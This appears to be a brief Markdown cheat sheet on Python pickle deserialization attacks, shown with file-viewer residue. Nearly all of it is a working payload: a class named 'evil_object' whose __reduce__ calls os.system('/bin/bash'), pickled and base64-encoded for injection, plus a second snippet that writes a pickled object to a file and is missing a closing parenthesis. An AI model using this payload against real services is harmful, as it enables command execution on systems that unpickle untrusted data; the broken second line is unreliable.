22 lines
365 B
Markdown
22 lines
365 B
Markdown
# Pickle
|
|
|
|
## Payload
|
|
* Inject payload
|
|
```python
|
|
import pickle
|
|
import os
|
|
import base64
|
|
class evil_object(object):
|
|
def __reduce__(self):
|
|
return(os.system, ('/bin/bash',))
|
|
x = evil_object()
|
|
x = evil_object()
|
|
y = pickle.dumps(x)
|
|
base64.b64encode(y)
|
|
```
|
|
|
|
* Dump serialized object via
|
|
```python
|
|
pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
|
|
```
|